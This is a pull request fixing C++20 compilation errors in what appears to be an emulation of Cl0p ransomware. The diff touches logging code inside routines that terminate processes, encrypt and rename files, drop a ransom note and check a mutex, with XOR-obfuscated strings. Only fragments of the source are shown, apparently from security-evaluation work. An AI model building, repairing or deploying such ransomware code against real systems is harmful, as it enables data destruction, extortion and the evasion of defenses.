### PR TITLE
Fix cl0p compilation issues

### DIFF
--- a/Enterprise/cl0p/Resources/Cl0p/src/defense.cpp
+++ b/Enterprise/cl0p/Resources/Cl0p/src/defense.cpp
@@ -272,12 +272,13 @@ namespace Defense {
         h_proc = OpenProcess(PROCESS_TERMINATE, false, proc_id);
 
         if (h_proc == NULL) {
+            DWORD errorCode = GetLastError();
             XorLogger::LogError(std::vformat(
                 XOR_LIT("OpenProcess failed for process {} (PID {}) with error code: {}"),
                 std::make_format_args(
                     proc_name,
                     proc_id,
-                    GetLastError()
+                    errorCode
                 )
             ));
         }
@@ -292,12 +293,13 @@ namespace Defense {
                 ));
             }
             else {
+                DWORD errorCode = GetLastError();
                 XorLogger::LogError(std::vformat(
                     XOR_LIT("TerminateProcess failed for process {} (PID {}) with error code: {}"),
                     std::make_format_args(
                         proc_name,
                         proc_id,
-                        GetLastError()
+                        errorCode
                     )
                 ));
             }
@@ -333,7 +335,8 @@ namespace Defense {
             }
         }
         else {
-            std::string message = std::vformat(XOR_LIT("Failed to enumerate processes with error code: {}"), std::make_format_args(GetLastError()));
+            DWORD errorCode = GetLastError();
+            std::string message = std::vformat(XOR_LIT("Failed to enumerate processes with error code: {}"), std::make_format_args(errorCode));
             XorLogger::LogError(message);
         }
 

--- a/Enterprise/cl0p/Resources/Cl0p/src/encryption.cpp
+++ b/Enterprise/cl0p/Resources/Cl0p/src/encryption.cpp
@@ -7,7 +7,13 @@ namespace Encryption {
 
         std::ifstream in{ filePathIn, std::ios::binary };
         if (!in.good()) {
-            XorLogger::LogError(std::vformat("{} {}", std::make_format_args(XOR_LIT("Could not open file"), filePathIn)));
+            XorLogger::LogError(std::vformat(
+                "{} {}",
+                std::make_format_args(
+                    const std::string(XOR_LIT("Could not open file")),
+                    filePathIn
+                )
+            ));
             return false;
         }
         std::string content((std::istreambuf_iterator<char>(in)),
@@ -16,18 +22,38 @@ namespace Encryption {
 
         std::ofstream out{ filePathIn, std::ios_base::out | std::ios::binary };
         if (!out.good()) {
-            XorLogger::LogError(std::vformat("{} {}", std::make_format_args(XOR_LIT("Could not open file"), filePathIn)));
+            XorLogger::LogError(std::vformat(
+                "{} {}",
+                std::make_format_args(
+                    const std::string(XOR_LIT("Could not open file")),
+                    filePathIn
+                )
+            ));
             return false;
         }
         out << content;
         out.close();
 
         if (!MoveFile(filePathIn.c_str(), filePathOut.c_str())) {
-            XorLogger::LogError(std::vformat("{} {}. Error code: {}", std::make_format_args(XOR_LIT("Failed to append extension to"), filePathIn, GetLastError())));
+            DWORD errorCode = GetLastError();
+            XorLogger::LogError(std::vformat(
+                "{} {}. Error code: {}",
+                std::make_format_args(
+                    const std::string(XOR_LIT("Failed to append extension to")),
+                    filePathIn,
+                    errorCode
+                )
+            ));
             return false;
         }
 
-        XorLogger::LogDebug(std::vformat("{} {}", std::make_format_args(XOR_LIT("Encrypted and appended extension to"), filePathIn)));
+        XorLogger::LogDebug(std::vformat(
+            "{} {}",
+            std::make_format_args(
+                const std::string(XOR_LIT("Encrypted and appended extension to")),
+                filePathIn
+            )
+        ));
         return true;
     }
 
@@ -52,7 +78,13 @@ namespace Encryption {
             }
         }
         catch (...) {
-            XorLogger::LogError(std::vformat("{} {}", std::make_format_args(XOR_LIT("Unknown exception when processing file"), file_path)));
+            XorLogger::LogError(std::vformat(
+                "{} {}",
+                std::make_format_args(
+                    const std::string(XOR_LIT("Unknown exception when processing file")),
+                    file_path
+                )
+            ));
             return false;
         }
         return true;
@@ -72,7 +104,13 @@ namespace Encryption {
                 if (!out) {
                     DWORD error = ::GetLastError(); // call close as possible to cause of error
                     std::string message = std::system_category().message(error);
-                    XorLogger::LogError(std::vformat(XOR_LIT("Error dropping ransom note ({}): {}"), std::make_format_args(NOTE_FILENAME, message)));
+                    XorLogger::LogError(std::vformat(
+                        XOR_LIT("Error dropping ransom note ({}): {}"),
+                        std::make_format_args(
+                            const std::string(NOTE_FILENAME),
+                            message
+                        )
+                    ));
                     return false;
                 }
             }

--- a/Enterprise/cl0p/Resources/Cl0p/src/guardrails.cpp
+++ b/Enterprise/cl0p/Resources/Cl0p/src/guardrails.cpp
@@ -6,7 +6,7 @@ namespace Guardrails {
     HANDLE Guardrails::h_mutex = NULL;
 
     bool CheckCreateMutex() {
-        XorLogger::LogInfo(std::vformat(XOR_LIT("Performing mutex check for mutex {}"), std::make_format_args(MUTEX_NAME)));
+        XorLogger::LogInfo(XOR_LIT("Performing mutex check for mutex ") + std::string(MUTEX_NAME));
         HANDLE h_temp = CreateMutexA(NULL, false, MUTEX_NAME);
         DWORD error_code = GetLastError();
         if (h_temp != NULL) {


### PR DESCRIPTION
Fixes compilation bugs such as `cannot convert argument 1 from 'const char *' to 'const char *&'`. These weren't seen previously because of the version of the build tools used. [VS 2022 v17.10](https://github.com/microsoft/STL/wiki/Changelog#vs-2022-1710) introduced C++20 update P2905R2 that broke this.